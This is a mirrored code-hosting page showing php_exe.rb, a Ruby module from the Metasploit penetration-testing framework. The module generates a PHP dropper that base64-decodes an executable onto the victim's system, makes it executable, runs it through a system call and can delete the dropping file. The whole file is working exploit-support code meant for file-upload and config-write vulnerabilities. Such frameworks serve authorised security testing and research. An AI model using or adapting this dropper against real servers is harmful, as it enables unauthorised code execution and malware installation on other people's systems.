Mirror of metasploit
You can not select more than 25 topics Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.

php_exe.rb 2.3KB

12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455565758596061626364656667686970717273747576777879808182838485868788
  1. # -*- coding: binary -*-
  2. ###
  3. #
  4. # This module exposes a simple method to create an payload in an executable.
  5. #
  6. ###
  7. module Msf
  8. module Exploit::PhpEXE
  9. include Exploit::EXE
  10. require 'msf/core/payload'
  11. require 'msf/core/payload/php'
  12. include Payload::Php
  13. #
  14. # Generate a first-stage php payload.
  15. #
  16. # For ARCH_PHP targets, simply returns payload.encoded wrapped in <?php ?>
  17. # markers.
  18. #
  19. # For target architectures other than ARCH_PHP, this will base64 encode an
  20. # appropriate executable and drop it on the target system. After running
  21. # it, the generated code will attempt to unlink the dropped executable which
  22. # will certainly fail on Windows.
  23. #
  24. # @option opts [String] :writable_path A path on the victim where we can
  25. # write an executable. Uses current directory if not given.
  26. # @option opts [Boolean] :unlink_self Whether to call unlink(__FILE__); in
  27. # the payload. Good idea for arbitrary-file-upload vulns, bad idea for
  28. # write-to-a-config-file vulns
  29. #
  30. # @return [String] A PHP payload that will drop an executable for non-php
  31. # target architectures
  32. #
  33. # @todo Test on Windows
  34. def get_write_exec_payload(opts={})
  35. case target_arch.first
  36. when ARCH_PHP
  37. php = payload.encoded
  38. else
  39. bin_name = Rex::Text.rand_text_alpha(8)
  40. if opts[:writable_path]
  41. bin_name = [opts[:writable_path], bin_name].join("/")
  42. else
  43. bin_name = "./#{bin_name}"
  44. end
  45. if target["Platform"] == 'win'
  46. bin_name << ".exe"
  47. print_warning("Unable to clean up #{bin_name}, delete it manually")
  48. end
  49. p = Rex::Text.encode_base64(generate_payload_exe)
  50. php = %Q{
  51. error_reporting(0);
  52. $ex = "#{bin_name}";
  53. $f = fopen($ex, "wb");
  54. fwrite($f, base64_decode("#{p}"));
  55. fclose($f);
  56. chmod($ex, 0777);
  57. function my_cmd($cmd) {
  58. #{php_preamble}
  59. #{php_system_block};
  60. }
  61. if (FALSE === strpos(strtolower(PHP_OS), 'win' )) {
  62. my_cmd($ex . "&");
  63. } else {
  64. my_cmd($ex);
  65. }
  66. unlink($ex);
  67. }
  68. end
  69. if opts[:unlink_self]
  70. # Prepend instead of appending to make sure it happens no matter
  71. # what the payload normally does.
  72. php = "@unlink(__FILE__);" + php
  73. end
  74. php.gsub!(/#.*$/, '')
  75. php.gsub!(/[\t ]+/, ' ')
  76. php.gsub!(/\n/, ' ')
  77. return "<?php #{php} ?>"
  78. end
  79. end
  80. end